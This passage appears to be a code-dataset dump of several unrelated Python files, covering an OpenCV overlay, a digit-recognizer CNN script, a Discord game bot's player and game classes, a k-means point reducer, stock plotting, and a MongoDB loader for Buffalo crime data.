img3_fg = cv2.bitwise_and(img3,img3,mask = mask)\n dst = cv2.add(img1_bg,img3_fg)\n img[fy+0-dy:fy+rows-dy, fx+0-dx:fx+cols-dx] = dst\n\n cv2.imshow('img',img)\n\n\n k = cv2.waitKey(30) & 0xff \n if k == ord('x'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"1)Glares_On_Face.py","file_name":"1)Glares_On_Face.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"259377045","text":"import pandas as pd\nimport numpy as np\nfrom PIL import Image\nimport sys\n\nfrom recognizer import *\n\nif __name__ == '__main__':\n FULL_PATH = '/home/ldaniel/Desktop/digit-recognizer/CNN/'\n\n model = Recognizer(FULL_PATH)\n\n if sys.argv[1] == 'train':\n model.train()\n elif sys.argv[1] == 'predict':\n comp = pd.read_csv(FULL_PATH + \"input/test.csv\")\n x_comp = comp.iloc[:, :].values.astype('float32')\n x_comp = x_comp.reshape(x_comp.shape[0], 1, 28, 28)\n x_comp /= 255\n\n pred = model.predict_classes(x_comp, load_mode=True)\n\n submissions = pd.DataFrame({\"ImageId\": list(range(1, len(pred) + 1)), \"Label\": pred})\n submissions.to_csv(FULL_PATH + \"output/submission.csv\", index=False, header=True)\n elif sys.argv[1] == 'image_prediction':\n img = Image.open('/home/ldaniel/Desktop/digit-recognizer/backend/src/main/resources/image/image.png')\n img.thumbnail((28, 28), Image.ANTIALIAS)\n\n pix = np.array(img)\n pix = pix[:, :, 3]\n\n pred = model.predict(pix.reshape(1, 1, 28, 28))\n\n submissions = pd.DataFrame({\"Nr\": list(range(0, len(pred[0, :]))), \"Acc\": pred[0, :]})\n submissions.to_csv(FULL_PATH + \"output/image_prediction.csv\", index=False, header=True)\n","sub_path":"digit-recognizer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"466437458","text":"\"\"\"Module for holding class structure for the bot to use.\"\"\"\nimport math\nfrom itertools import cycle, islice\nfrom os.path import sep\nfrom random import randint\n\nimport discord\nfrom PIL import Image, ImageDraw, ImageFont\n\nimport auth\nimport database as db\nimport drawing\nfrom vars import bot\nimport utils\n\n\nclass Guild:\n \"\"\"Guild object that stores preferences for a guild the bot is in\n\n Args:\n name (str): The name of the guild\n id (int): The id of the guild from discord\n prefix (str): The custom guild command prefix\n\n Attributes:\n _guilds (dict, int:Guild): Stores all of the created guilds\n name (str): The name of the guild\n id (int): The id of the guild from discord\n prefix (str): The custom guild command prefix\n \"\"\"\n _guilds = {} # dict of guilds that have been created\n\n def __init__(self, id, **kwargs):\n self.name = str(bot.get_guild(id))\n self.id = id\n self.prefix = kwargs.get(\"prefix\", \"!\")\n Guild._guilds[id] = self # add guild to the dict\n\n @property\n def dguild(self):\n \"\"\"Returns the discord.py version of the guild\"\"\"\n return bot.get_guild(self.id)\n\n ################## CLASS METHODS ##################\n\n @classmethod\n def get(cls, id):\n \"\"\"Find guild in the dictionary.\"\"\"\n try:\n return cls._guilds[id]\n except KeyError:\n data = db.find_guild(id)\n if data:\n print(\"Guild retrieved from database\")\n return Guild.from_json(data)\n else:\n raise auth.MissingGuild(\"Not Found\")\n\n @classmethod\n def pop(cls, id, alt=None):\n \"\"\"Pop a value off the dict list\"\"\"\n return cls._guilds.pop(id, alt)\n\n ################## JSON CONVERSION ##################\n\n def to_json(self):\n \"\"\"Convert a guild to valid JSON format\"\"\"\n return {\n \"id\": self.id,\n \"prefix\": self.prefix\n }\n\n @staticmethod\n def from_json(data):\n \"\"\"Convert valid JSON to guild object.\"\"\"\n return Guild(\n id=data[\"id\"],\n prefix=data[\"prefix\"],\n )\n\n\nclass Player:\n \"\"\"Global stats\n\n Args:\n id (int): the members discord id\n guild_id (int): The id of the guild the member belongs to\n\n Attributes:\n id (int): the members discord id\n guild_id (int): The id of the guild the member belongs to\n \"\"\"\n _players = {}\n\n RANK_THRESHOLD = 1000\n\n TITLES = (\"Benda\", \"Noob\", \"Amateur\", \"Experienced\",\n \"Skilled\", \"Expert\", \"Semi-Pro\", \"Pro\")\n EXTRA_TITLES = (\"He Who Hands Claps\", \"Sherpa\",\n \"I'm a 1700\", \"I Don't Lose\", \"GC\", \"The Placer\", \"Edumacated\", \"The Prodigy\",\n \"Born Champion\", \"Godly\", \"Unbelievably Talented\", \"Nut\", \"Swanson\")\n\n def __init__(self, id, **kwargs):\n self.name = str(bot.get_user(id).name)\n self.id = id\n\n # Currency/XP\n self.xp = kwargs.get(\"xp\", 0)\n self.pbucks = kwargs.get(\"pbucks\", 0)\n\n # Cosmetics\n self.banner = kwargs.get(\"banner\", \"dice\")\n self.banners = kwargs.get(\"banners\", [\"dice\", \"bonobo\", \"lonewolf\"])\n self.title = kwargs.get(\"title\", \"Benda\")\n self.titles = kwargs.get(\"titles\", [\"Benda\"])\n self.card_bg = kwargs.get(\"card_background\", (\"#000000\", 128))\n\n # Statistics\n self.games_played = kwargs.get(\"games_played\", Game.DEFAULT_STATS)\n self.wins = kwargs.get(\"wins\", Game.DEFAULT_STATS) # fat W's\n self.draws = kwargs.get(\"draws\", Game.DEFAULT_STATS)\n Player._players[id] = self\n\n @property\n def card_background(self):\n \"\"\"Turns hex and opacity to RBGA Tuple\"\"\"\n return utils.hex_to_rgb(self.card_bg[0]) + (self.card_bg[1],)\n\n @property\n def losses(self):\n \"\"\"The losses the player has.\"\"\"\n return {k: self.games_played[k] - self.wins[k] - self.draws[k] for k in self.wins.keys()}\n\n @property\n def ratio(self):\n \"\"\"The Win-Loss ratio for the player.\"\"\"\n ratio_dict = {}\n for k, v in self.wins.items():\n games = v + self.losses[k]\n games = games if games else 1\n ratio_dict[k] = self.wins[k] / games\n return ratio_dict\n\n @property\n def most_played(self):\n \"\"\"Returns the most played game.\"\"\"\n return max(self.games_played, key=self.games_played.get)\n\n @property\n def user(self):\n return bot.get_user(self.id)\n\n @classmethod\n def get(cls, id):\n try:\n return cls._players[id]\n except KeyError:\n data = db.find_player(id)\n if data:\n print(\"Player retrieved from database\")\n return Player.from_json(data)\n else:\n raise auth.RegistrationError(\n \"Couldn't find info for player. Make sure that you registered.\")\n\n async def send(self, content=None, embed=None, file=None):\n \"\"\"Passthrough for sending DM.\"\"\"\n await self.user.send(content=content, embed=embed, file=file)\n ################## STAT MANAGEMENT ##################\n\n def update(self, game, won=False, draw=False):\n \"\"\"Update a player.\"\"\"\n old_xp = self.xp\n self.xp += Game.XP_MULTIPLIERS[game] * Game.XP_VALUES[won]\n\n # Acquire new title if needed\n if int(old_xp) // Player.RANK_THRESHOLD != int(self.xp) // Player.RANK_THRESHOLD:\n print(\"TITLE SWITCH\")\n self.title = Player.TITLES[int(self.xp // Player.RANK_THRESHOLD)]\n self.titles.append(self.title)\n\n # update games played\n self.games_played[game] += 1\n if won:\n self.wins[game] += 1\n elif draw:\n self.draws[game] += 1\n\n ################## JSON CONVERSION ##################\n\n def to_json(self):\n \"\"\"Convert Color object to valid JSON.\"\"\"\n return {\n \"id\": self.id,\n \"xp\": self.xp,\n \"pbucks\": self.pbucks,\n \"title\": self.title,\n \"titles\": self.titles,\n \"banner\": self.banner,\n \"banners\": self.banners,\n \"card_background\": self.card_bg,\n \"games_played\": self.games_played,\n \"wins\": self.wins,\n \"draws\": self.draws\n }\n\n @staticmethod\n def from_json(player):\n \"\"\"Create Theme object from valid JSON\"\"\"\n return Player(\n id=player[\"id\"],\n xp=player.get(\"xp\", 0),\n pbucks=player.get(\"pbucks\", 0),\n title=player.get(\"title\", \"Benda\"),\n titles=player.get(\"titles\", [\"Benda\"]),\n banner=player.get(\"banner\", \"dice\"),\n banners=player.get(\"banners\", [\"dice\", \"bonobo\", \"lonewolf\"]),\n card_background=player.get(\"card_background\", (\"#000000\", 128)),\n games_played=player.get(\"games_played\", Game.DEFAULT_STATS),\n wins=player.get(\"wins\", Game.DEFAULT_STATS),\n draws=player.get(\"draws\", Game.DEFAULT_STATS)\n )\n\n ################## DRAWING ##################\n\n def draw_banner(self):\n \"\"\"Draws the players banner.\"\"\"\n # open and set to draw\n banner = Image.open(f\"assets{sep}banners{sep}{self.banner}.png\")\n d = ImageDraw.Draw(banner)\n\n # fonts\n namefnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 47)\n titlefnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 34)\n\n # draw name and title\n _, namey = d.textsize(self.name, namefnt)\n name_offset = 100 - namey\n d.text((40, name_offset), self.name, font=namefnt)\n d.text((40, 105), self.title, font=titlefnt)\n return banner\n\n def draw_banners(self):\n \"\"\"Draws all of the available banners the player has\"\"\"\n\n # Banner dims\n BWIDTH, BHEIGHT = 400, 100\n BMIDDLE = BHEIGHT//2\n MID_PADDING = 10\n ROWS = math.ceil(len(self.banners)/2)\n IMGW = BWIDTH*2+MID_PADDING\n IMGH = ROWS * (BHEIGHT + MID_PADDING) - MID_PADDING\n\n # Create new canvas\n background = Image.new(\n mode=\"RGBA\",\n size=(IMGW, IMGH),\n color=self.card_background\n )\n font = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 30)\n\n for i, name in enumerate(self.banners):\n row = i // 2 * BHEIGHT + MID_PADDING * (i//2) # 00112233\n col = i % 2 * BWIDTH # 01010101\n\n if i % 2 == 1:\n col += MID_PADDING\n\n if i // 2 != 0:\n row + MID_PADDING\n\n banner = Image.open(f\"assets{sep}banners{sep}{name}.png\")\n banner = banner.resize((BWIDTH, BHEIGHT))\n d = ImageDraw.Draw(banner)\n\n _, texty = font.getsize(name)\n text_offset = (BWIDTH//10, BMIDDLE - texty//2)\n d.text(text_offset, name, font=font)\n\n background.paste(banner, (col, row))\n return background\n\n def draw_xp(self, gains=0):\n \"\"\"Draws the xp bar\"\"\"\n threshold = Player.RANK_THRESHOLD\n # Create new canvas\n xpbar = Image.new(\n mode=\"RGBA\",\n size=(400, 20),\n color=(128, 128, 128, 128)\n )\n d = ImageDraw.Draw(xpbar) # set image for drawing\n\n x1, y1 = 0, 0\n gains_percentage = ((self.xp + gains) % threshold)/threshold\n x2 = int(400 * gains_percentage)\n y2 = 20\n d.rectangle((x1, y1, x2, y2), fill=(37, 204, 247, 255))\n\n xp_percentage = ((self.xp) % threshold) / threshold\n x2 = int(400 * xp_percentage)\n d.rectangle((x1, y1, x2, y2), fill=(24, 44, 97, 255))\n\n return xpbar\n\n def draw_card(self, crown=False, gains=0):\n c_width = 420\n c_height = 230\n\n # Create new canvas\n background = Image.new(\n mode=\"RGBA\",\n size=(c_width, c_height),\n color=self.card_background\n )\n\n avatar = drawing.get_user_img(self.user, size=128, mask=\"circle\")\n avatar.thumbnail((100, 100), Image.ANTIALIAS)\n\n avatar_offset = (10, 10)\n background.paste(avatar, avatar_offset, avatar)\n\n banner = self.draw_banner()\n banner.thumbnail((400, 100))\n _, bannery = banner.size\n banner_offset = (10, c_height - bannery - 10)\n background.paste(banner, banner_offset)\n\n xpbar = self.draw_xp(gains=gains)\n xpbar.thumbnail((270, 270))\n xpw, xph = xpbar.size\n xpbar_offset = (c_width - (10 + xpw),\n c_height - (10 + bannery + 10 + xph))\n background.paste(xpbar, xpbar_offset)\n\n # Draw winners crown\n if crown:\n crown = Image.open(f\"assets{sep}crownicon.png\")\n crown.thumbnail((20, 20), Image.ANTIALIAS)\n background.paste(crown, (5, 5), crown)\n\n return background\n\n\nclass Game:\n\n _games = {}\n\n DEFAULT_STATS = {\n \"tictactoe\": 0,\n \"hangman\": 0,\n \"battleship\": 0,\n \"rps\": 0 # Rock Paper Scissors\n }\n\n XP_MULTIPLIERS = {\n \"tictactoe\": .1,\n \"hangman\": .2,\n \"battleship\": 1,\n \"rps\": .05 # Rock Paper Scissors\n }\n\n XP_VALUES = {\n True: 100,\n False: 20\n }\n\n def __init__(self, name, channel, *players):\n self.channel = channel\n self.winners = set()\n self.players = list(players)\n self.turn_cycle = islice(cycle(self.players),\n randint(0, len(self.players)-1),\n None)\n self.lead = next(self.turn_cycle) # The player whose turn it is\n self.name = name\n self.id = str(channel.id) + self.name\n\n Game._games[self.id] = self\n\n @property\n def ids(self):\n return {p.id for p in self.players}\n\n @classmethod\n def get(cls, id):\n \"\"\"Get a game based on a member passed in\"\"\"\n return cls._games.get(id)\n\n def next_turn(self):\n \"\"\"Change the lead to the next player in line.\"\"\"\n self.lead = next(self.turn_cycle)\n\n def award_xp(self):\n \"\"\"Awards all game players XP\"\"\"\n for player in self.players:\n player.update(game=self.name,\n won=player.id in self.winners,\n draw=not self.winners)\n\n db.update(*self.players)\n\n def draw_scoreboard(self):\n \"\"\"Draw the scoreboard of players\"\"\"\n BAR_HEIGHT = 100\n IMGW = 900\n ROWS = len(self.players) + 1\n IMGH = ROWS * BAR_HEIGHT\n PADDING_TOP = .1 * BAR_HEIGHT\n\n NAME_PCT = .2\n XP_PCT = .6\n RATIO_PCT = .9\n\n # Make image\n scoreboard = Image.new(\n mode=\"RGBA\",\n size=(IMGW, IMGH),\n color=(0, 0, 0, 0)\n )\n d = ImageDraw.Draw(scoreboard)\n catfnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 50)\n statfnt = ImageFont.truetype(f\"assets{sep}Roboto.ttf\", 40)\n\n # draw categories\n for category, pct in zip((\"Player\", \"XP\", \"W/L\"), (NAME_PCT, XP_PCT, RATIO_PCT)):\n msgx, _ = catfnt.getsize(category)\n offset = (pct * IMGW - msgx // 2, PADDING_TOP)\n d.text(offset, category, font=catfnt)\n\n d.line((0, BAR_HEIGHT, IMGW, BAR_HEIGHT),\n fill=(255, 255, 255, 255), width=5)\n\n crown = Image.open(f\"assets{sep}crownicon.png\")\n crown.thumbnail((50, 50), Image.ANTIALIAS)\n\n for i, player in enumerate(self.players, 1):\n # rem = i % len(self.players) + 1 # 0,1,0,1\n top = BAR_HEIGHT * i\n center = top + BAR_HEIGHT//2\n\n # DRAW CROWN\n result = player.id in self.winners\n if result:\n _, cy = crown.size\n scoreboard.paste(crown, (10, center - cy//2), crown)\n\n # DRAW NAME\n msgx, msgy = statfnt.getsize(player.name)\n offset = (NAME_PCT*IMGW - msgx//2,\n center - msgy//2)\n d.text(offset, player.name, font=statfnt)\n\n # DRAW XPBAR\n gains = Game.XP_MULTIPLIERS[self.name] * Game.XP_VALUES[result]\n xpbar = player.draw_xp(gains=gains)\n xpbar_width = int(.4 * IMGW)\n xpbar_height = BAR_HEIGHT - 40\n xpbar = xpbar.resize((xpbar_width, xpbar_height))\n xpbar_offset = (int(XP_PCT * IMGW - xpbar_width // 2),\n center - xpbar_height//2)\n scoreboard.paste(xpbar, xpbar_offset)\n\n # DRAW W/L RATIO\n ratio = player.ratio[self.name] * 100\n msg = f\"{round(ratio, 1)}%\"\n msgx, msgy = statfnt.getsize(msg)\n offset = (RATIO_PCT * IMGW - msgx//2,\n center - msgy//2)\n d.text(offset, msg, font=statfnt)\n\n return scoreboard\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":14900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"14338665","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.svm import SVC\n\nx_train = pd.read_csv(\"../input/train.csv\")\n\ntarget = x_train.iloc[:100, -1].values\nX = x_train.iloc[:100, 1:-1].values\n\npca = PCA(n_components=0.8)\nX_new = pca.fit_transform(X)\nX_positive = X_new[target == 1, :]\nX_negative = X_new[target == 0, :]\npos_len = len(X_positive)\n\nclfs = [0] * 25\nfor i in range(25):\n X_part = X_negative[i * pos_len : (i + 1) * pos_len - 1]\n clfs[i] = SVC()\n clfs[i].fit(np.concatenate((X_part, X_positive)), np.concatenate((np.zeros((len(X_part), 1)), np.ones((pos_len, 1)))))\n\ndel target, X_positive, X_negative \nx_test = pd.read_csv(\"../input/test.csv\").values\nresult = np.sum(np.array([clfs[i].predict(pca.transform(x_test[:, 1:])) for i in range(25)]), axis=1) / 25.\nresult = pd.DataFrame({\"ID\": x_test[:, 0].astype('int'), \"TARGET\": result})\nresult.to_csv('submission.csv', index=False)","sub_path":"santander/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"130302101","text":"# 5) FAÇA UM PROGRAMA QUE ITERE UM DICIONARIO COM NOTAS DE ALUNO, FAÇA A MEDIA E SE ELA FOR MAIOR QUE 6 IMPRIMA APROVADO, SENAO IMPRIMA REPROVADO.\n\nalunos = [{\n \"nome\": \"Gabriel\",\n \"idade\": 27,\n \"email\": \"ganbriel@email.com\",\n \"notas\": [ \n 5, 6, 8, 10\n ]\n},\n{\n \"nome\": \"Victor\",\n \"idade\": 27,\n \"email\": \"victor@email.com\",\n \"notas\": [ \n 10, 8, 5, 9, 1 \n ]\n}]\n\nfor a in alunos:\n notas = 0\n for n in a[\"notas\"]:\n notas += n\n if notas/len(a[\"notas\"]) > 6:\n print(\"Aprovado, media: \" + str(notas/len(a[\"notas\"])))\n else:\n print(\"Nao Aprovado, media: \" + str(notas/len(a[\"notas\"])))\n \n\n","sub_path":"python/aula 3/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"383517923","text":"import numpy as np\nimport random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom pandas_datareader import data as web\nimport time\n\n\n\n##############\n#Some user input here , possibly a GUI for selecting stocks#\n\n\nstart_time = time.time()\n\n\nassets = ['FB' , 'TWTR' , 'CX' , 'NFLX' , 'AMD']\n\nweightings = np.array([0.2 , 0.2 , 0.2 , 0.2 , 0.2])\n\nstockStartDate = '2015-01-01'\n\ntoday = datetime.today().strftime('%Y-%m-%d')\n\ndf = pd.DataFrame()\n\nfor stock in assets:\n df[stock] = web.DataReader(stock , data_source = 'yahoo' , start = stockStartDate , end = today)['Adj Close']\n\n\ntitle = 'Daily Percentage Change'\n\nmy_stocks = df\n\n\ndef returns():\n#create and plot graph (loops through each column)\n for columns in my_stocks.columns.values:\n my_stocks[columns] = my_stocks[columns].pct_change(periods = 10)\n plt.plot(my_stocks[columns] , label = my_stocks)\n\n plt.title(title)\n plt.xlabel('Data' , fontsize= 18)\n plt.ylabel('Adj Price' , fontsize= 18)\n plt.legend(my_stocks.columns.values , loc = 'upper left')\n plt.show()\n\n # for items in my_stocks.columns.values:\n # my_stocks[items] = my_stocks[columns].std()\n\n# def return_distribution():\n\nreturns()\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","sub_path":"FinanceProjects/FinProject.py","file_name":"FinProject.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"467177249","text":"\"\"\"\n@Author: Yu Huang\n@Email: yuhuang-cst@foxmail.com\n\"\"\"\n\nimport scipy.sparse as sp\nimport numpy as np\nfrom collections import Counter\n\nfrom rph_kmeans.point_reducer_base import RPPointReducerBase\nfrom rph_kmeans._point_reducer_cy import get_ary_labels\nfrom rph_kmeans._point_reducer_cy import update_densex_and_weight, update_sparsex_and_weight, update_labels\nfrom rph_kmeans._point_reducer_cy import densex_radius_bkt_improve, sparsex_radius_bkt_improve\nfrom rph_kmeans.utils import cal_dist2_ary_sparse, cal_dist2_ary_dense\n\n\nclass RPPointReducerCy(RPPointReducerBase):\n\tdef __init__(self, w=None, max_point=2000, proj_num=5, max_iter=1000, sample_dist_num=1000,\n\t\t\tbkt_improve=None, radius_divide=None, bkt_size_keepr=1.0, center_dist_keepr=1.0, verbose=1):\n\t\tsuper(RPPointReducerCy, self).__init__(w, max_point, proj_num, max_iter, sample_dist_num,\n\t\t\tbkt_improve, radius_divide, bkt_size_keepr, center_dist_keepr, verbose=verbose)\n\n\n\tdef fit_transform(self, X):\n\t\t\"\"\"\n\t\tArgs:\n\t\t\tX (numpy.ndarray or scipy.sparse.csr_matrix): (sample_num, feature_size)\n\t\tReturns:\n\t\t\tnp.ndarray: (reduced_point_num, feature_size); reduced points\n\t\t\tnp.ndarray: (reduced_point_num,); weight, number of samples belonging to each reduced point\n\t\t\tnp.ndarray: (sample_num,); labels, indicating which reduced point each sample belongs to\n\t\t\tint: number of iteration\n\t\t\"\"\"\n\t\tX = self.check_input_X(X)\n\t\tself.check_max_point(self.max_point, X)\n\t\tself.cal_dist2_ary_func = cal_dist2_ary_sparse if self.sparse_x else cal_dist2_ary_dense\n\n\t\tsample_num, feature_size = X.shape\n\t\tself.get_w(X)\n\t\titer_num = 0\n\t\tgroup_num = sample_num\n\n\t\tlabels = np.arange(0, sample_num, dtype=np.uint32)\n\t\tgroup_weight = np.ones((sample_num,), dtype=X.dtype)\n\t\treduced_X = X\n\n\t\tif self.verbose > 0:\n\t\t\tprint('Iteration begin: X.shape = {}, max_point = {}, w = {}, proj_num = {}'.format(X.shape, self.max_point, self.w, self.proj_num))\n\t\twhile iter_num < self.max_iter:\n\t\t\tif group_num <= self.max_point:\n\t\t\t\tif self.verbose > 0:\n\t\t\t\t\tprint('Reduced point number {} <= max_point {}. Iteration stop.'.format(group_num, self.max_point))\n\t\t\t\tbreak\n\n\t\t\tproj_vecs, b = self.gen_proj(feature_size, self.w)\n\t\t\tpj_mat = self.random_projection(reduced_X, proj_vecs, b) # (group_num, projection_num)\n\t\t\tbkt_ary, bkt_num = get_ary_labels(pj_mat)\n\n\t\t\tif self.bkt_improve == 'radius':\n\t\t\t\tbkt_num = self.radius_bkt_improve(reduced_X, bkt_ary, self.radius2, bkt_num)\n\t\t\telif self.bkt_improve == 'min_bkt_size':\n\t\t\t\tif self.bkt_size_keepr < 1.0:\n\t\t\t\t\tbkt_num = self.min_bkt_size_bkt_improve(bkt_ary)\n\t\t\telif self.bkt_improve == 'min_center_dist':\n\t\t\t\tif self.center_dist_keepr < 1.0:\n\t\t\t\t\tbkt_num = self.min_center_dist_bkt_improve(bkt_ary, reduced_X)\n\t\t\telse:\n\t\t\t\tif self.bkt_improve is not None:\n\t\t\t\t\traise RuntimeError(\"Parameter bkt_improve must be one of {None, 'radius', 'min_bkt_size', 'min_center_dist'}\")\n\n\t\t\tupdate_labels(labels, bkt_ary)\n\t\t\treduced_X, group_weight = self.update_x_and_weight(reduced_X, group_weight, bkt_ary, bkt_num)\n\n\t\t\tgroup_num = bkt_num\n\t\t\titer_num += 1\n\n\t\t\tif iter_num == 1:\n\t\t\t\tself.cal_dist2_ary_func = cal_dist2_ary_dense\n\n\t\t\tif self.verbose > 1:\n\t\t\t\tgroup_bkt_count, orphan_point_count = self.count_group_orphan(bkt_ary)\n\t\t\t\tprint('Iter {}: Reduced point number = {}; Group bucket number={}; Orphan point number={}'.format(\n\t\t\t\t\titer_num, group_num, group_bkt_count, orphan_point_count))\n\n\t\tif self.verbose > 0:\n\t\t\tprint('Total iteration = {}; Number of reduced points = {}'.format(iter_num, group_num))\n\t\treturn reduced_X, group_weight.flatten(), labels, iter_num\n\n\n\tdef radius_bkt_improve(self, reduced_X, bkt_ary, R2, bkt_num):\n\t\tif sp.issparse(reduced_X):\n\t\t\tdata, indices, indptr = reduced_X.data, reduced_X.indices, reduced_X.indptr\n\t\t\treturn sparsex_radius_bkt_improve(data, indices, indptr, reduced_X.shape[0], reduced_X.shape[1], bkt_ary, R2, bkt_num)\n\t\telse:\n\t\t\treturn densex_radius_bkt_improve(reduced_X, bkt_ary, R2, bkt_num)\n\n\n\tdef bkt_ary_buckets_keepr_wrapper(self, bkt_ary, handle_func, *args, **kwargs):\n\t\tbuckets = self.bkt_ary_to_buckets(bkt_ary)\n\t\tgroup_buckets, orphan_points = self.split_group_orphan(buckets)\n\n\t\tsorted_idx, keep_num = handle_func(group_buckets, *args, **kwargs)\n\n\t\tfor i, idx in enumerate(sorted_idx[:keep_num]):\n\t\t\tbkt_ary[group_buckets[idx]] = i\n\t\torphan_points.extend([p_idx for bkt_idx in sorted_idx[keep_num:] for p_idx in group_buckets[bkt_idx]])\n\t\tbkt_num = len(orphan_points) + keep_num\n\t\tbkt_ary[orphan_points] = np.arange(keep_num, bkt_num, dtype=np.uint32)\n\n\t\treturn bkt_num\n\n\n\tdef min_bkt_size_bkt_improve(self, bkt_ary):\n\t\t# TODO: write with c++\n\t\treturn self.bkt_ary_buckets_keepr_wrapper(bkt_ary, self.min_bkt_size_bkt_improve_)\n\n\n\tdef min_bkt_size_bkt_improve_(self, group_buckets):\n\t\tsorted_idx = np.argsort([len(bkt) for bkt in group_buckets])\n\t\tkeep_num = int(len(group_buckets) * self.bkt_size_keepr)\n\t\treturn sorted_idx, keep_num\n\n\n\tdef min_center_dist_bkt_improve(self, bkt_ary, X):\n\t\t# TODO: write with c++\n\t\treturn self.bkt_ary_buckets_keepr_wrapper(bkt_ary, self.min_center_dist_bkt_improve_, X)\n\n\n\tdef min_center_dist_bkt_improve_(self, group_buckets, X):\n\t\tkeep_num = int(len(group_buckets) * self.center_dist_keepr)\n\t\tdist_ary = []\n\t\tfor bkt in group_buckets:\n\t\t\tcenter = np.mean(X[bkt], axis=0)\n\t\t\tif sp.issparse(X):\n\t\t\t\tcenter = sp.csr_matrix(center)\n\t\t\tdist_ary.append(np.median(self.cal_dist2_ary_func(X[bkt], center))) # (bucket_size,)\n\t\tsorted_idx = np.argsort(dist_ary)\n\t\treturn sorted_idx, keep_num\n\n\n\tdef update_x_and_weight(self, reduced_X, weight, bkt_ary, bkt_num):\n\t\tif sp.issparse(reduced_X):\n\t\t\treturn update_sparsex_and_weight(reduced_X, weight, bkt_ary, bkt_num)\n\t\telse:\n\t\t\treturn update_densex_and_weight(reduced_X, weight, bkt_ary, bkt_num)\n\n\n\tdef bkt_ary_to_buckets(self, bkt_ary):\n\t\td = {}\n\t\tfor i, bkt_id in enumerate(bkt_ary):\n\t\t\td.setdefault(bkt_id, []).append(i)\n\t\treturn list(d.values())\n\n\n\tdef count_group_orphan(self, bkt_ary):\n\t\tcounter = Counter(bkt_ary)\n\t\torphan_count = 0\n\t\tfor bkt_id, member_count in counter.items():\n\t\t\tif member_count == 1:\n\t\t\t\torphan_count += 1\n\t\treturn len(counter) - orphan_count, orphan_count\n\n\n","sub_path":"rph_kmeans/point_reducer_cy.py","file_name":"point_reducer_cy.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"185188791","text":"import pymongo as pm\nimport numpy as np\nimport csv\nimport json\nfrom geopy import distance\n\ndef main():\n\tconnection = pm.MongoClient()\n\tbuffalo = connection.buffalo\n\n\tdirectory = \"../../data/\"\n\tcamerasData = readGeoJson(directory+\"Buffalo Police Department Camera Locations.geojson\")\n\tpoliceDistricts = readGeoJson(directory+\"Police Districts.geojson\")\n\tstreetsData = readGeoJson(directory+\"Streets.geojson\")\n\tcrimeData = readCSV(directory+\"Crime_Incidents.csv\")\n\n\tprint(\"Dropping Cameras...\")\n\tbuffalo.cameras.drop()\n\tprint(\"Cameras dropped!\")\n\tbuffalo.cameras.create_index([(\"geometry\", \"2dsphere\")])\n\tprint(\"Loading Cameras...\")\n\tingestGeoJsonFeatureToMongoDB(camerasData, buffalo.cameras)\n\tprint(\"Cameras loaded!\")\n\n\n\tprint(\"Dropping Districts...\")\n\tbuffalo.districts.drop()\n\tprint(\"Districts dropped!\")\n\tbuffalo.districts.create_index([(\"geometry\", \"2dsphere\")])\n\tprint(\"Loading Districts...\")\n\tingestGeoJsonFeatureToMongoDB(policeDistricts, buffalo.districts)\n\tprint(\"Districts loaded!\")\n\n\n\tprint(\"Dropping Streets...\")\n\tbuffalo.streets.drop()\n\tprint(\"Streets dropped!\")\n\tbuffalo.streets.create_index([(\"geometry\", \"2dsphere\")])\n\tprint(\"Loading Streets...\")\n\tingestGeoJsonFeatureToMongoDB(streetsData, buffalo.streets)\n\tprint(\"Streets loaded!\")\n\n\n\tprint(\"Updating Streets...\")\n\t# Update each street with a length\n\tcursor = buffalo.streets.find()\n\twhile cursor.alive:\n\t\tlength = 0\n\t\ttoken = cursor.next()\n\t\tcoords = token['geometry']['coordinates']\n\t\tfor i in range(len(coords)):\n\t\t\tfor j in range(len(coords[i])):\n\t\t\t\tfor k in range(j+1, len(coords[i])):\n\t\t\t\t\tlength += getLength(coords[i][j], coords[i][k])\n\t\tbuffalo.streets.update_one( {\"_id\":token['_id']}, {\"$set\": { \"streetLength\": length }} )\n\tprint(\"Streets updated!\")\n\n\n\t'''\n\t['incident_id' 'case_number' 'incident_datetime' 'incident_type_primary'\n\t 'incident_description' 'clearance_type' 'address_1' 'address_2' 'city'\n\t 'state' 'zip' 'country' 'latitude' 'longitude' 'created_at' 'updated_at'\n\t 'location' 'hour_of_day' 'day_of_week' 'parent_incident_type']\n\t'''\n\tprint(\"Dropping Crimes...\")\n\tbuffalo.crimes.drop()\n\tprint(\"Crimes dropped!\")\n\tbuffalo.crimes.create_index([(\"location\", pm.GEO2D)])\n\tprint(\"Loading Crimes...\")\n\tkeys = crimeData[0]\n\tfor i in range(1, len(crimeData)):\n\t\tpayload = getJson(keys, crimeData[i])\n\t\tpayload['location'] = str(payload['longitude']) + ',' + str(payload['latitude'] )\n\t\tbuffalo.crimes.insert_one(payload)\n\tprint(\"Crimes loaded!\")\n\n\n\n\tprint(\"Updating Crimes...\")\n\tcursor = buffalo.crimes.find()\n\ti = 0\n\twhile cursor.alive:\n\t\ti += 1\n\t\tif i % 5000 == 0:\n\t\t\tprint(i, \" tokens 